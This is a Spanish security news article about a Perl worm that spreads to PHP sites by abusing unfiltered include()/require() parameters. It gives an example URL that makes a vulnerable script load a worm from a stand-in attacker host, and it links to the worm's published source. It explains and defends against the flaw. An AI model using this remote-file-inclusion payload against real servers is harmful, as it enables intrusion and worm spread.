Nuevo gusano para servidores web con PHP


Este nuevo espécimen puede infectar cualquier sitio web PHP que contenga ciertos errores de programación. Al igual que "Santy", también utiliza motores de búsqueda para localizar webs potencialmente vulnerables, en esta ocasión Google Brasil y Yahoo.





Aunque en principio algunas casas antivirus lo han relacionado con el gusano Santy que aprovechaba vulnerabilidades de phpBB, en realidad se trata de un nuevo gusano que puede afectar a cualquier sitio web que utilice PHP y que no haya sido programado de forma segura.

Es importante que los antivirus modifiquen el nombre dado al gusano, que en un principio ha sido tratado como si fuera una variante de Santy. Aunque tiene muchas similitudes, es importante tratarlo como un nuevo gusano, ya que de lo contrario puede crear confusión si los webmasters y programadores PHP piensan que sólo afecta a los sitios web con una versión vulnerable de phpBB. En este sentido Kaspersky lo ha pasado a denominar "Spyki" (Net-Worm.Perl.Spyki).

El nuevo gusano, escrito en Perl, aprovecha si el programador de la página PHP ha hecho uso de las funciones include() y require() sin filtrar adecuadamente los parámetros de entrada, lo que facilita al atacante, o en este caso al gusano, insertar y ejecutar archivos en el servidor de forma arbitraria.

En realidad se trata de una de las reglas básicas de la programación segura que todo diseñador web debe tener en cuenta. Nunca debe de abrir un archivo basándose en un parámetro externo sin comprobar la validez del mismo. Pese a ello, es un error frecuente el permitir hacer referencias a archivos externos, o internos saliendo de la raíz pública del web, a través de un parámetro en la URL.

De forma que si nosotros tenemos un script para abrir archivos HTML del servidor web, que por ejemplo podemos llamar de esta forma:

http://nuestroservidor/abrepagina.php?htm=index.htm

Un atacante podría provocar que cargara en su lugar un script malicioso, o un gusano como en el caso que nos ocupa, de la forma:

http://nuestroservidor/abrepagina.php?htm=http://atacante/gusano.php

La solución pasa por evitar parámetros de forma arbitraria cuando programamos el script PHP, filtrando todas las referencias que no se ajusten a las páginas legítimas del servidor web.

Código del nuevo gusano
http://www.k-otik.com/exploits/20041225.PhpIncludeWorm.php

 

Fuente:
Bernardo Quintero
hispasec.com



Otras noticias de interés:

Las páginas web de Presidencia y Defensa sufren un ataque informático
Las páginas web de los ministerio de Defensa y Presidencia sufrieron un ataque informático durante la madrugada de ayer que impidió el acceso a los respectivos sitios durante todo el día. La caída de las páginas se produjo tras un incremento de...
La industria de la música demanda de nuevo a los creadores de Morpheus
La industria de la música presentó una nueva demanda de violación de derechos de autor contra los diseñadores del servicio de intercambio de archivos, Morpheus, casi un mes después de sufrir una derrota en su lucha legal contra este sistema...
10 predicciones de seguridad para 2011
El amigo Sergio Hernando desde su blog (Seguridad de la Información y Auditoría de Sistemas) ha escrito en forma sencilla lo que él piensa que son las 10 principales predicciones en torno a la seguridad para año venidero....
Inteco Publica Guía:Seguridad y privacidad en el Comercio Electrónico
En los últimos años, cada vez son más los internautas que compran en Internet. El mercado online tiene un carácter global y competitivo y en él compradores y vendedores han adaptado sus hábitos y forma de relacionarse, con el fin de disfrutar d...
¿Quién es el culpable de la pérdida de datos?
El 40 por ciento de los usuarios, tanto del sector empresarial, como del público, particular y del canal de distribución, considera que el error humano es la principal causa de las pérdidas de datos....
Los riesgos de los servicios de geolocalización
La vulnerabilidad de las aplicaciones Web y la naturaleza de los sistemas de localización personal puede resultar una combinación peligrosa, sobre todo por las facilidades que pueden aportar a criminales o acosadores....
Microsoft critica revelación apresurada de vulnerabilidad en Office
Programador anónimo ha detectado un error crítico en el paquete ofimático Microsoft Office. Por su parte, el gigante informático critica que la información haya sido dada a conocer a la opinión p&uacu...
Actualización de Acrobat y Reader para evitar 0-DAY
Adobe ha lanzado nuevas actualizaciones de Acrobat y Reader para hacer frente a una vulnerabilidad de día cero en Flash. A principios de la pasada semana, Adobe lanzó una versión actualizada de Adobe Flash, si bien días después ha hecho lo propi...
Dispositivos móviles y el Malware
El malware para dispositivos móviles es una realidad y su número crece cada día debido al incremento de su uso y a la valiosa información que pueden contener aunque los usuarios no lleguen a ser conscientes de su importancia....
Desbordante ataque de virus
Aunque se desconocen las causas de esta explosión de virus, lo único cierto es que en los últimos dos días los usuarios están siendo atacados por numerosos virus desde diferentes frentes. Slapper, bugbear, tanatos, opaserv; sin contar además co...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • gusano
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • nuevo
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • servidores
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra